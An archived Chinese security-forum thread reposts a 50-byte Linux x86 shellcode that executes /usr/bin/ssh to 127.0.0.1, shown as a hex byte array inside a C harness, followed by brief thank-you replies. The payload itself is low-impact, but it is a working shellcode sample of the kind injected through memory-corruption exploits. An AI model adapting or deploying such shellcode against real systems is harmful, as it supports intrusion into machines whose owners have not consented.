linux/x86 execve("/usr/bin/ssh", "127.0.0.1") - 50 bytes - 漏洞情报 - 红客联盟 - 由08安全团队运营

90_ 发表于 2015-5-1 14:19:11

linux/x86 execve("/usr/bin/ssh", "127.0.0.1") - 50 bytes

Risk Security Risk Low
// linux/x86 execve("/usr/bin/ssh", ["/usr/bin/ssh", "127.0.0.1"], NULL) - 50 bytes
// Febriyanto Nugroho
#include <stdio.h>

char shellcode[] = "\x6a\x0b"
                   "\x58"
                   "\x99"
                   "\x52"
                   "\x68\x2f\x73\x73\x68"
                   "\x68\x2f\x62\x69\x6e"
                   "\x68\x2f\x75\x73\x72"
                   "\x89\xe3"
                   "\x52"
                   "\x6a\x31"
                   "\x66\x68\x30\x2e"
                   "\x66\x68\x30\x2e"
                   "\x66\x68\x37\x2e"
                   "\x66\x68\x31\x32"
                   "\x89\xe1"
                   "\x52"
                   "\x51"
                   "\x53"
                   "\x89\xe1"
                   "\xcd\x80";

int main(int argc, char **argv) {
asm("jmp %0;" : "=m" (shellcode));
}
#

Thanatos 发表于 2015-5-2 10:59:02

小菜表示看不懂！

灵少发表于 2015-5-3 03:13:34

数一下够不够十个字了

云游者 发表于 2015-6-27 03:38:17

学习学习技术，加油！

wanmznh 发表于 2015-6-27 04:43:25

admin1964 发表于 2015-6-27 07:01:31

感谢楼主的分享~

arctic 发表于 2015-6-27 08:10:33

加油！干倒冰儿和酒仙！

ljy07 发表于 2015-6-27 12:36:07

支持中国红客联盟(ihonker.org)

Jack-5 发表于 2015-6-27 15:55:10

ruguoruo 发表于 2015-6-28 07:12:13

页: [1]

红客联盟 - 由08安全团队运营's Archiver

linux/x86 execve("/usr/bin/ssh", "127.0.0.1") - 50 bytes